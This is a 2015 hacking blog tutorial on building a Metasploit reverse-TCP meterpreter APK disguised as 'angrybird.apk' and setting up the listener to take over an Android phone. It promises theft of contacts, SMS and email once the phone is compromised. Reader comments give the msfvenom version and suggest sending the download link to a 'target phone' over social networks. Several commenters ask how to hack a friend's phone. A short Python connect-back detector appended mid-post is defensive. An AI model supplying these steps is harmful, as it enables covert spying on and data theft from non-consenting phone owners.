SHUBHAM KANSARA

Just For Hacking: HACKING ANDROID DEVICE USING METASPLOIT BACKDOORS

Wednesday 6 May 2015

HACKING ANDROID DEVICE USING METASPLOIT BACKDOORS






INTRODUCTION
Metasploit is an open-source penetration testing framework. The Metasploit project provides information about security vulnerabilities and supports penetration testing, the development and execution of exploits against remote machines, and IPS/IDS signature development.

Note: In this tutorial I use my Gionee M2. This backdoor will work on all Android OSes irrespective of customisation.

SETUP INFORMATION

192.168.0.3     Victim's IP address (Gionee M2)
192.168.0.5     Attacker's IP address (Metasploit)


As this is a demo, I am using Google Drive to download the Metasploit backdoor (malicious app).


CREATE BACKDOOR

Use Kali Linux with the Metasploit Framework installed to generate the payload.


  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4488 R > angrybird.apk


msfpayload       Metasploit command to create a payload (exe, apk, java, etc.)

LHOST            (local host) Attacker's IP address for the victim to connect back to

LPORT            (local port) Port for the victim to connect back to

R                msfpayload parameter that indicates generation of a raw payload





   



Successful execution of msfpayload creates the angrybird.apk app, which is a Metasploit reverse TCP backdoor. When the app is installed on any Android device, it connects back to the attacker's IP address (192.168.0.5 here).

Before the app is installed on the device, the attacker needs to run the following Metasploit commands so that the victim's machine can connect back to the attacker's machine.


  • msfconsole










  • use exploit/multi/handler 
  • set payload android/meterpreter/reverse_tcp
  • set LHOST <attackers_ip_address>
  • set LPORT <connect_back_port>
  • exploit





When the malicious APK runs on the target device, Metasploit's meterpreter shell opens. For meterpreter command help, type 'help' at the meterpreter prompt.




Once the user is compromised, we can escalate our privileges, make the backdoor persistent, and steal contacts, SMS, email, etc.
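A defender's view of the connect-back described above, as an added example that is not part of the original post: it scans flow records for a handset that repeatedly opens TCP sessions to another private address on a port outside an allow-list. The record format, the allow-list and the hit threshold are assumptions; the sample records are constructed from the addresses and port used in this post.

```python
import ipaddress
from collections import Counter

# Constructed flow records (not captured traffic), one per line:
# epoch src_ip src_port dst_ip dst_port proto
SAMPLE_FLOWS = """\
1430900000 192.168.0.3 51544 142.250.0.10 443 tcp
1430900005 192.168.0.3 40112 192.168.0.5 4488 tcp
1430900012 192.168.0.3 40118 192.168.0.5 4488 tcp
1430900020 192.168.0.3 53211 192.168.0.1 53 udp
1430900031 192.168.0.7 49822 192.168.0.5 445 tcp
1430900044 192.168.0.3 40125 192.168.0.5 4488 tcp
this line is malformed and must be skipped
"""

HANDSETS = {"192.168.0.3"}                   # phone addresses (the post's setup)
EXPECTED_PORTS = {53, 80, 443, 5353, 8009}   # assumed allow-list for this LAN


def parse_flow(line):
    """Return (src, dst, dport, proto) or None for a malformed record."""
    fields = line.split()
    if len(fields) != 6:
        return None
    _, src, _, dst, dport, proto = fields
    try:
        return (ipaddress.ip_address(src), ipaddress.ip_address(dst),
                int(dport), proto.lower())
    except ValueError:
        return None


def suspicious_callbacks(text, handsets=HANDSETS, expected=EXPECTED_PORTS,
                         min_hits=2):
    """Flag handset -> private-address TCP sessions on unexpected ports."""
    hits = Counter()
    for line in text.splitlines():
        flow = parse_flow(line)
        if flow is None:
            continue
        src, dst, dport, proto = flow
        if proto != "tcp" or str(src) not in handsets:
            continue
        if not dst.is_private or dport in expected:
            continue
        hits[(str(src), str(dst), dport)] += 1
    return sorted(k + (n,) for k, n in hits.items() if n >= min_hits)


if __name__ == "__main__":
    for src, dst, port, count in suspicious_callbacks(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{port} seen {count} times")
```

The heuristic covers only the same-LAN setup used in this post; a connect-back to a public address needs a per-device baseline of expected destinations instead.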



                                             THANKS FOR YOUR PATIENCE

15 comments:

  1. This comment has been removed by a blog administrator.

  2. Sir, when I write ----- msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4488 R > angrybird.apk ----- on Kali Linux 2.0,
    the message shown is "command not found". I tried many times but failed. Please tell me the reason for this problem.
    Thanks.
    Reply to me as soon as possible.

    1. you can use this command :-

      msfvenom -p android/meterpreter/reverse_tcp LHOST=system_ip_address LPORT=4444 R > abcd.apk

    2. sir i need your help how to create the backdoor apk.......sir

  3. Sir, I have one more request for help... if I want to hack my friend's phone, which IP address do I type here? My friend's IP or my IP? Please help me.

  4. Great Post!

    A meterpreter is the best way to hack devices

  5. So how do you get the specific device you want? How do you get it on their phone?

  6. Send the apk file through cloudsend and send the download link to target phone through social networking or something!

  7. This comment has been removed by the author.

    1. Sir, I did the same, but after this
      (started reverse TCP handler on ip :4444
      starting the payload handler )

      nothing happens.

  8. can u help me exactly in the process for hacking an android over WAN ??
